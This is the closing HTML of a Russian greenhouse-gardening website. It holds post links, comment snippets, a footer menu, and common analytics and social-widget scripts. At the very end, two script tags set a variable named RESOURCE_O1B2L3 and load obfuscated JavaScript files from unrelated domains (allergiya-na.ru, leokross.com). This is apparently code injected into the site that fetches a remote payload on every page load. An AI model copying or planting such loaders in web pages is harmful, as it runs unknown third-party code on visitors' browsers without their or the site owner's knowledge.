    <div class="inf-panel"><span>7.01.22</span><span class="j1">0</span><span class="j2">27</span></div>
</div>
<div class="post">
    <a class="post-ct" href="https://parnik-teplitsa.ru/kompozitnye-kupeli-s-podogrevom-dlya-ulicy"><img src="https://parnik-teplitsa.ru/wp-content/uploads/2022/01/qwer011.jpg" height="125" alt=""/>Композитные купели с подогревом для улицы</a>
    <div class="inf-panel"><span>7.01.22</span><span class="j1">0</span><span class="j2">320</span></div>
</div>
<div class="post">
    <a class="post-ct" href="https://parnik-teplitsa.ru/holodilnye-shkafy-v-sovremennom-ispolnenii"><img src="https://parnik-teplitsa.ru/wp-content/uploads/2021/12/qwer011-3.jpg" height="125" alt=""/>Холодильные шкафы в современном исполнении</a>
    <div class="inf-panel"><span>30.12.21</span><span class="j1">0</span><span class="j2">14</span></div>
</div>
</div>

<!--Комментарии
<div class="title-side">Последние комментарии</div>
<div class="blm blm2">
        <ul class="recom">
            
<li><b>Ваше имя: </b><br><a href='https://parnik-teplitsa.ru/razmeshhenie-pomidor-v-teplice-134#comment-7777' title='к записи: Размещение Помидоров В Теплице: Отличная Инструкция'>С нашим обучением на сегодня даже свое и …</a></li>
<li><b>Ваше имя: </b><br><a href='https://parnik-teplitsa.ru/vyrashhivanie-cvetov-v-teplice-68#comment-7769' title='к записи: Выращивание Цветов В Теплице: Благоприятные Условия Для Растений'>Спасибо вам большое. Нам ваша информация …</a></li>
<li><b>Ваше имя: </b><br><a href='https://parnik-teplitsa.ru/formirovanie-perca-v-teplice-184#comment-7759' title='к записи: Формирование Перца В Теплицах: Детальная Инструкция'>Комментарий</a></li>
<li><b>Троцкий: </b><br><a href='https://parnik-teplitsa.ru/parnikovaya-plenka-chernaya-162#comment-7753' title='к записи: Черная Парниковая Пленка: Детальная Инструкция'>Ленин, геотекстиль подстелите тогда комф …</a></li>
<li><b>Евгений: </b><br><a href='https://parnik-teplitsa.ru/realno-li-vyrashhivanie-klubniki-zimoj-62#comment-7697' title='к записи: Выращивание Клубники В Теплице Зимой: Подробная Инструкция'>Есть ли люди которые выращивают зимой в  …</a></li>        </ul>
    </div>

<!-- Тест на строителя -->
<a href="http://parnik-teplitsa.ru/kakoj-iz-vas-stroitel" class="big-bans2"></a>
<div class="big-bans-mob2"><a href="http://parnik-teplitsa.ru/kakoj-iz-vas-stroitel"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/ban-nw2.jpg" alt=""></a></div>

<!--Галерея теплиц-->

<div class="fl-slide-s fl-slide-s2">
    <div class="title-s-fl1">Галерея теплиц</div>
    <div class="fl-tt-s1">
      <a href="http://parnik-teplitsa.ru/foto"><img src="http://parnik-teplitsa.ru/wp-content/uploads/2015/02/sad1-300x230.jpg" alt=""><span><b><font color="8B0000;"><big>Теплицы для дачи</b></font></span></big></a>
      <a href="http://parnik-teplitsa.ru/promyshlennye-modeli-foto"><img src="http://parnik-teplitsa.ru/wp-content/uploads/2015/02/moskva-teplicy_iz_polikarbonata_rolstani_i_avtomaticheskie_vorota_700.jpeg" alt=""><span><b><font color="8B0000;"><big>Промышленные модели</b></font></span></big></a>
      <a href="http://parnik-teplitsa.ru/krasivye-i-neobychnye-teplicy-foto"><img src="http://parnik-teplitsa.ru/wp-content/uploads/2015/02/57-fsd-300x230.jpg" alt=""><span><b><font color="8B0000;"><big>Необычные теплицы</b></font></span></big></a>
    </div>
</div>
</div>        <div class="clear"></div>
    </section>



<footer id="footer">
    <div class="ct-foot" >
	



 <div class="km1" style="float:left;padding:10px 0;margin-left: 300px">

<ul style="list-style:none">


<li><a href="http://parnik-teplitsa.ru/fundament-konstrukcii"><font color="8B0000;"><span>Фундамент</span></font></a></li>

<li><a href="http://parnik-teplitsa.ru/karkas-konstrukcii"><font color="8B0000;"><span>Каркас</span></font></a></li>
</font>
<li>	<a href="http://parnik-teplitsa.ru/pokrytie"><font color="8B0000;"><span>Покрытие</span></a></font></li>

<li><a href="http://parnik-teplitsa.ru/teplicy-i-parniki-iz-polikarbonata"><font color="8B0000;"><span>Теплицы из поликарбоната</span></font></a></li>

<li>	<a href="http://parnik-teplitsa.ru/vidy-teplic"><font color="8B0000;"><span>Виды теплиц</span></font></a></li>

<li>       <a href="http://parnik-teplitsa.ru/promyshlennye-teplicy"><font color="8B0000;"><span>Промышленные модели</span></font></a></li>
    
<li>       <a href="http://parnik-teplitsa.ru/otoplenie-obsluzhivanie-teplic"><font color="8B0000;"><span>Отопление</span></font></a></li>

<li>	<a href="http://parnik-teplitsa.ru/poliv-v-teplice"><font color="8B0000;"><span>Автополив в теплице</span></font></a></li>


</ul>
</div>


<div class="km2" style="float:left;padding:10px 0;margin-left: 20px">

<ul style="list-style:none">
 <li>   <a href="http://parnik-teplitsa.ru/ventilyaciya-obsluzhivanie-teplic"><font color="8B0000;"><span>Вентиляция</span></font></a></li>
<li>    <a href="http://parnik-teplitsa.ru/osveshhenie-obsluzhivanie-teplic"><font color="8B0000;"><span>Освещение</span></font></a></li>

<li> 	<a href="http://parnik-teplitsa.ru/gryadki-posadki-v-teplice"><font color="8B0000;"><span>Грядки</span></font></a></li>

<li> 	<a href="http://parnik-teplitsa.ru/rasteniya"><font color="8B0000;"><span>Выращивание овощей</span></font></a></li>

<li> 	<a href="http://parnik-teplitsa.ru/formirovanie-posadki-v-teplice"><font color="8B0000;"><span>Формирование овощей</span></font></a></li>

<li> 	<a href="http://parnik-teplitsa.ru/poliv-posadki-v-teplice"><font color="8B0000;"><span>Полив овощей</span></font></a></li>

 <li>    <a href="http://parnik-teplitsa.ru/podkorm"><font color="8B0000;"><span>Подкорм</span></a></font></li>

<li>     <a href="http://parnik-teplitsa.ru/problemyboleznivrediteli"><font color="8B0000;"><span>Болезни и вредители</span></font></a></li>


</ul>
</div>





<div style="clear:both;"></div>




	
	

<script> (function(d,w,c){ (w[c] = w[c] || []).push(function(){ try{ new LeaderService.init({ site: 32, widget : { callback: { active: false, wrap: 'leaderCallBack32', }, chat: { active: true, }, form: { active: false, wrap: 'leaderFormArea32' }, call: { active: false, wrap: 'leaderPartnerCall32' }, } }); } catch(e){} }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { d.body.appendChild(s) }; s.type = "text/javascript"; s.async = true; s.src = "http://dev.leader.su/plugins/app.js?"+ (+new Date()); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "LeaderService"); </script> 




        <div class="ov-ft1">
                    <div class="copyr">Связь с администрацией <br> info@parnik-teplitsa.ru <br> 2014-2015, parnik-teplitsa.ru<br>

                <a href="http://parnik-teplitsa.ru/karta-sajta" >Карта сайта</a><br>    

                <a href="http://parnik-teplitsa.ru/reklamodatelyam">Рекламодателям</a><br>
                <!-- Yandex.Metrika informer -->
                <a href="https://metrika.yandex.ru/stat/?id=22001953&amp;from=informer"
                target="_blank" rel="nofollow"><img src="//bs.yandex.ru/informer/22001953/3_1_FFFFFFFF_EFEFEFFF_0_pageviews"
                style="width:88px; height:31px; border:0;" alt="Яндекс.Метрика" title="Яндекс.Метрика: данные за сегодня (просмотры, визиты и уникальные посетители)" onclick="try{Ya.Metrika.informer({i:this,id:22001953,lang:'ru'});return false}catch(e){}"/></a>
                <!-- /Yandex.Metrika informer -->

                <!-- Yandex.Metrika counter -->
                <script type="text/javascript">
                (function (d, w, c) {
                    (w[c] = w[c] || []).push(function() {
                        try {
                            w.yaCounter22001953 = new Ya.Metrika({id:22001953,
                                    clickmap:true,
                                    trackLinks:true,
                                    accurateTrackBounce:true});
                        } catch(e) { }
                    });

                    var n = d.getElementsByTagName("script")[0],
                        s = d.createElement("script"),
                        f = function () { n.parentNode.insertBefore(s, n); };
                    s.type = "text/javascript";
                    s.async = true;
                    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

                    if (w.opera == "[object Opera]") {
                        d.addEventListener("DOMContentLoaded", f, false);
                    } else { f(); }
                })(document, window, "yandex_metrika_callbacks");
                </script>
                <noscript><div><img src="//mc.yandex.ru/watch/22001953" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
                <!-- /Yandex.Metrika counter -->

                <!--LiveInternet counter--><script type="text/javascript"><!--
                document.write("<a href='//www.liveinternet.ru/click' "+
                "target=_blank><img src='//counter.yadro.ru/hit?t17.6;r"+
                escape(document.referrer)+((typeof(screen)=="undefined")?"":
                ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
                screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
                ";"+Math.random()+
                "' alt='' title='LiveInternet: показано число просмотров за 24"+
                " часа, посетителей за 24 часа и за сегодня' "+
                "border='0' width='88' height='31'><\/a>")
                //--></script><!--/LiveInternet-->

<!-- Facebook Pixel Code -->
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '170969310508155');
  fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
  src="https://www.facebook.com/tr?id=170969310508155&ev=PageView&noscript=1"
/></noscript>
<!-- End Facebook Pixel Code -->



        </div>



</div>

        <!--<div class="chet"><img src="https://parnik-teplitsa.ru/wp-content/themes/parnik/img/chet.jpg" alt=""/></div>--> 





</div></div>
    </div>



</footer>
</div>
	<div id="vk_api_transport"></div>
	<script type="text/javascript">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</script><script type='text/javascript' src='https://parnik-teplitsa.ru/wp-content/plugins/easy-vkontakte-connect/js/evc-share.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/parnik-teplitsa.ru\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://parnik-teplitsa.ru/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script>
<script type='text/javascript' src='https://parnik-teplitsa.ru/wp-content/plugins/table-of-contents-plus/front.min.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var viewsCacheL10n = {"admin_ajax_url":"https:\/\/parnik-teplitsa.ru\/wp-admin\/admin-ajax.php","post_id":"748"};
/* ]]> */
</script>
<script type='text/javascript' src='https://parnik-teplitsa.ru/wp-content/plugins/wp-postviews/postviews-cache.js'></script>
<script type='text/javascript' src='https://parnik-teplitsa.ru/wp-includes/js/wp-embed.min.js'></script>
	<script type="text/javascript">
		/* <![CDATA[ */
		jQuery(document).ready(function ($) {

			if (typeof VKWidgetsComments !== 'undefined' && VKWidgetsComments.length && evc_post_id) {
				if ($('#vk-widget-' + evc_post_id).length) {
										if ($('#respond').length) {
						$('#respond form').hide();
						$('#respond').append($('#vk-widget-' + evc_post_id));
					}
									}

								cClose = false;
				if ($("#comments .comment-list").length) {
					$("#comments .comment-list").wrap('<div class = "evc-comments-wrap"></div>');

					docViewHeight = $(window).height();
					$(document).scroll(function () {
						var docViewTop = $(window).scrollTop();
						var elemTop = $('.evc-comments-wrap').offset().top;
						//var elemBottom = elemTop + $('.evc-comments-wrap').height();
						if (elemTop * 3 / 4 <= docViewTop && !cClose) {
							cClose = true;
							$(".evc-comments-wrap").animate({"height": 0}, 800);
							//console.log(elemTop + ' >= ' + docViewHeight+ '+'+ docViewTop);
						}
					});
				}
							}

			// Rresponsive VK Comments Widget Width
						if ($('.vk_widget_comments').length) {

				responsiveVkWidget();
				$(window).on('resize', function () {
					responsiveVkWidget();
				});
			}
			
			function responsiveVkWidget() {
				var vkParentWidth = parseInt($('.vk_widget_comments').parent().width());

				$('.vk_widget_comments, .vk_widget_comments iframe').css({
					width: vkParentWidth
				});
				$('.vk_widget_comments, .vk_widget_comments iframe').attr('width', vkParentWidth);
			}

			// END Rresponsive VK Comments Widget Width


		}); // End jQuery

		/* ]]> */
	</script><script type="text/javascript" id="slb_context">/* <![CDATA[ */if ( !!window.jQuery ) {(function($){$(document).ready(function(){if ( !!window.SLB ) { {$.extend(SLB, {"context":["public","user_guest"]});} }})})(jQuery);}/* ]]> */</script>
	
		<script>
			jQuery(document).ready(function($){ 
				$('#comment_agree').prop('checked', false);
				
				$( "#commentform #submit" ).click(function() {						
					if ( $('#comment_agree').is(':checked') ) return false;	
				});
			});
		</script>	
	

<link rel="stylesheet" href="https://parnik-teplitsa.ru/wp-content/themes/parnik/social/social-likes_flat.css"> 
<script src="https://parnik-teplitsa.ru/wp-content/themes/parnik/social/social-likes.min.js"></script> 
<script>window.RESOURCE_O1B2L3 = 'allergiya-na.ru';</script>
<script src="//allergiya-na.ru/5z/_K.js" ></script>
<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/O1j/_6xh.js" ></script>
<!-- SQL - 113 | 0,429 сек. | 26.61 МБ -->


</body>
</html>
<!-- This website is like a Rocket, isn't it ? Performance optimized by WP Rocket. Learn more: http://wp-rocket.me - Debug: cached@1645409597 -->